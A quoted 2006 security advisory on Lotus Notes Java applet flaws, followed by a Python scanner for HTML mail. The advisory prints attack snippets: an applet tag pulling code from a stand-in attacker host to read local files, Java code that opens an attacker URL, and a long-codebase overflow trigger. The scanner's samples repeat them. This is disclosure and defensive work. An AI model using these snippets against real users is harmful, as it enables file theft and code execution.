> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Sunday, October 08, 2006 3:15 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NT] Lotus Notes Multiple Java Applet Vulnerabilities
>
> The following security advisory is sent to the securiteam
> mailing list, and can be found at the SecuriTeam web site:
> http://www.securiteam.com
>
> Lotus Notes Multiple Java Applet Vulnerabilities
>
>
>
> Lotus Notes is a groupware/e-mail system developed by Lotus
> Software. Due to its security and collaboration features it's
> used particularly by large organizations, government
> agencies, etc. IBM estimates it is used by 60 million people.
>
> The vulnerabilities involve Java applets embedded in HTML
> formatted e-mail messages. A contributing factor in all of
> the issues is that such Java applets are automatically
> displayed when the e-mail message is viewed (unlike with most
> e-mail clients).
>
>
> Vulnerable Systems:
> * Lotus Notes versions 6.0x.
> * Lotus Notes versions 6.5x.
>
> Global file read access:
> An e-mail message containing a Java Applet with the codebase
> "file:///" gains unlimited read access to local files when
> the e-mail is viewed. An example HTML snippet follows:
> <applet codebase="file:///"
> archive="http://www.attacker.tld/applet.jar"
> width="1" height="1"></applet>
>
>
> The applet's Java bytecode itself needn't be contained in the
> e-mail; it is only referenced by the archive URL. The
> applet gets automatically loaded when the e-mail is viewed.
> It has file read access on the local system (can read
> whatever files the currently logged-in user can, and list
> hard drive contents). The applet can use e.g. JavaScript to
> relay the files to the attacker.
>
> Launching web browser:
> A Java applet embedded in the same way can forcibly launch a
> web browser with the desired URL when an e-mail message is viewed.
>
> An example piece of Java code to do this follows:
> public void init() {
>     try {
>         // showDocument() takes a java.net.URL, not a String
>         getAppletContext().showDocument(new java.net.URL("http://www.attacker.tld/ie-exploits.html"));
>     } catch (java.net.MalformedURLException e) {
>         // cannot happen for this literal URL
>     }
> }
>
>
> Under default settings, Internet Explorer is launched and the
> attacker supplied URL is opened in it when the e-mail message
> is viewed. This exposes the system to Internet Explorer
> vulnerabilities, greatly widening the attack surface.
>
> Codebase buffer overflow:
> Opening an HTML e-mail message which contains an applet tag
> with a long codebase parameter (over 500 bytes) causes an
> apparently stack-based buffer overflow condition. It may be
> exploitable to run arbitrary code on the victim system when
> the e-mail message is viewed.
>
> This is an example piece of HTML to produce it:
> <applet codebase="A:AAAAAAAAAAAAAAA( repeat 520 A's )AAAAAA"
> code="java.applet.Applet" width=100 height=100></applet>
>
> Exploitability of this scenario was NOT confirmed.
>
> Workaround:
> Disabling Java applets can be used to protect from these
> vulnerabilities.
> To disable Java applets, select File -> Preferences -> User
> Preferences from the Notes client menu and uncheck the option
> for "Enable Java applets."
>
> Fix:
> The issues have been addressed in Lotus Notes versions 6.5.4
> and 6.0.5.
> For detailed fix information, see:
> http://www-1.ibm.com/support/docview.wss?rs=0&uid=swg21173910&loc=en_US&cs=utf-8&cc=us?=en
>
>
> Additional Information:
> The information has been provided by Jouko Pynnonen
> <mailto:jouko@xxxxxx>.
> The original article can be found at: http://iki.fi/jouko
>
>
> ================================================================================
>
>
>
>
>
> This bulletin is sent to members of the SecuriTeam mailing list.
> To unsubscribe from the list, send mail with an empty subject
> line and body to: html-list-unsubscribe@xxxxxxxxxxxxxx
> In order to subscribe to the mailing list and receive
> advisories in HTML format, simply forward this email to:
> html-list-subscribe@xxxxxxxxxxxxxx
>
>
>
> ================================================================================
>
> DISCLAIMER:
> The information in this bulletin is provided "AS IS" without
> warranty of any kind.
> In no event shall we be liable for any damages whatsoever
> including direct, indirect, incidental, consequential, loss
> of business profits or special damages.
>
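The advisory's three patterns (a `file:` codebase, applet bytecode fetched from a remote archive, and an oversized codebase attribute) can all be recognised in the HTML before it reaches a Notes client. The following is an added example of a gateway-side scanner in Python, not code from the advisory, SecuriTeam or IBM. It assumes a mail filter that can see the raw message, uses the 500-byte threshold the advisory quotes as its limit, and runs over constructed sample messages that reproduce the advisory's HTML snippets; it does not claim to parse HTML the way the Notes client does.

```python
"""
Gateway-side scan of HTML e-mail for <applet> tags matching the three
patterns in the advisory: a file: codebase, applet bytecode pulled from a
remote archive, and an oversized codebase value.
"""
import email
import email.policy
from html.parser import HTMLParser

# The advisory reports the overflow for codebase values over 500 bytes.
CODEBASE_LIMIT = 500
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


class AppletScanner(HTMLParser):
    """Collects (line, [reasons]) for every <applet> start tag seen."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "applet":          # HTMLParser lower-cases tag names
            return
        a = {name.lower(): (value or "") for name, value in attrs}
        codebase = a.get("codebase", "")
        reasons = []
        if codebase.lower().startswith("file:"):
            reasons.append("file: codebase (grants local file read)")
        size = len(codebase.encode("utf-8"))
        if size > CODEBASE_LIMIT:
            reasons.append(f"oversized codebase ({size} bytes > {CODEBASE_LIMIT})")
        # Bytecode need not be in the message: any remote archive/codebase
        # means the applet body is fetched from the sender's server.
        for attr in ("archive", "codebase", "code", "object"):
            if a.get(attr, "").lower().startswith(REMOTE_SCHEMES):
                reasons.append(f"remote {attr}: {a[attr]}")
        if not reasons:
            reasons.append("applet tag present (auto-executed when viewed)")
        self.findings.append((self.getpos()[0], reasons))


def scan_html(body: str):
    """Return findings for one HTML document."""
    parser = AppletScanner()
    parser.feed(body)
    parser.close()
    return parser.findings


def scan_message(raw: bytes):
    """Scan every text/html part of an RFC 822 message."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            findings.extend(scan_html(part.get_content()))
    return findings


def build_sample(html_body: str) -> bytes:
    """Constructed single-part HTML message (sample data, not a real capture)."""
    headers = (
        "From: sender@example.invalid\r\n"
        "To: recipient@example.invalid\r\n"
        "Subject: constructed sample\r\n"
        "MIME-Version: 1.0\r\n"
        "Content-Type: text/html; charset=utf-8\r\n\r\n"
    )
    return (headers + html_body).encode("utf-8")


# Constructed samples reproducing the advisory's HTML snippets.
SAMPLES = {
    "file_read": build_sample(
        '<html><body><applet codebase="file:///" '
        'archive="http://www.attacker.tld/applet.jar" '
        'width="1" height="1"></applet></body></html>'
    ),
    "long_codebase": build_sample(
        '<html><body><applet codebase="A:' + "A" * 520 + '" '
        'code="java.applet.Applet" width=100 height=100></applet></body></html>'
    ),
    "benign": build_sample("<html><body><p>Quarterly report attached.</p></body></html>"),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, scan_message(raw))
```

Any applet tag at all is reported, because the advisory's point is that Notes runs applets as soon as the message is displayed; the specific reasons only rank how bad a given tag is. A filter built on this should quarantine rather than strip, since an attacker who can reach the client with the tag intact has already won.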